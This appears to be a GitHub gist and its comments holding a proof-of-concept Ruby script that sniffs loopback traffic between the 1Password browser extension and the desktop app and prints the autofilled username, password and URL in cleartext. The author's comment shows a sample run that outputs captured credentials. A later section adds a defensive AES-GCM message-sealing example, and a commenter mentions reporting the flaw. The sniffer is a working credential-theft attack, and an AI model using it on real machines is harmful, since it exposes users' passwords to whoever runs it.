Steal 1Password credentials from browser auto-fill PoC
# Path setting sleight of hand:
$: << File.expand_path("../../lib", __FILE__)
require 'packetfu'
require 'json'

capture_thread = Thread.new do
  # Capture on the loopback interface, where the browser extension and the
  # 1Password application exchange messages.
  cap = PacketFu::Capture.new(:iface => 'lo0', :start => true)
  cap.stream.each do |p|
    pkt = PacketFu::Packet.parse p
    # The auto-fill message is identifiable by its "executeFillScript" action.
    if pkt.payload.include?("executeFillScript")
      parsed_json = JSON.parse(pkt.payload.match(/{"action.*/)[0])
      # The fill script carries the username and password as cleartext values.
      username = parsed_json["payload"]["script"][1][2]
      password = parsed_json["payload"]["script"][3][2]
      url = parsed_json["payload"]["url"]
      puts "[+] Stolen Credentials: user(#{username}), password(#{password}), url(#{url})"
    end
  end
end

puts "Listening for 1Password interprocess traffic on loopback..."
capture_thread.join

claudijd (author) commented May 19, 2016

$ rvmsudo ruby examples/steal_1password_creds.rb
Listening for 1Password interprocess traffic on loopback...
[+] Stolen Credentials: user(wbrandis), password(myvoiceismypassportverify), url(https://login.yahoo.com/config/login_verify2?&.src=ym)
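
On the defensive side of the cleartext loopback messages shown above, this added example (not code from the gist author or from 1Password) seals each message with AES-256-GCM so that a loopback capture sees only ciphertext and any modification is rejected. The pre-shared `SESSION_KEY`, the `ipc-v1` label, the helper names and the sample message are assumptions made for illustration.

```ruby
require 'openssl'
require 'json'
require 'base64'

# Assumption: both endpoints already share this key (key setup is not shown).
SESSION_KEY = OpenSSL::Random.random_bytes(32)
AAD = 'ipc-v1' # constructed context label, bound into the authentication tag

# Constructed sample with only the fields the gist reads
# (script[1][2], script[3][2] and url); all values are placeholders.
SAMPLE = {
  'action'  => 'executeFillScript',
  'payload' => {
    'script' => [['op0'], ['op1', 'field', 'example-user'],
                 ['op2'], ['op3', 'field', 'example-password']],
    'url'    => 'https://login.example.com/'
  }
}.freeze

# Encrypt and authenticate one message; returns nonce || tag || ciphertext.
def seal_message(key, message)
  cipher = OpenSSL::Cipher.new('aes-256-gcm').encrypt
  cipher.key = key
  nonce = cipher.random_iv # fresh 96-bit nonce for every message
  cipher.auth_data = AAD
  ct = cipher.update(JSON.generate(message)) + cipher.final
  Base64.strict_encode64(nonce + cipher.auth_tag + ct)
end

# Verify and decrypt; raises OpenSSL::Cipher::CipherError if the frame was altered.
def open_message(key, frame)
  raw = Base64.strict_decode64(frame)
  cipher = OpenSSL::Cipher.new('aes-256-gcm').decrypt
  cipher.key = key
  cipher.iv = raw[0, 12]
  cipher.auth_tag = raw[12, 16]
  cipher.auth_data = AAD
  JSON.parse(cipher.update(raw[28..-1]) + cipher.final)
end

# True when the bytes on the wire still expose the marker the gist matches on.
def leaks_marker?(wire_bytes)
  wire_bytes.include?('executeFillScript')
end

frame = seal_message(SESSION_KEY, SAMPLE)
puts "cleartext exposes marker: #{leaks_marker?(JSON.generate(SAMPLE))}"
puts "sealed frame exposes marker: #{leaks_marker?(frame)}"
```

Encryption only helps if the key is kept out of reach of other local processes; how the two endpoints agree on it is outside this example.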

picchioni commented May 23, 2016

Funny story about this, I found it too a couple months ago, reported it and 1Password really didn't seem to care.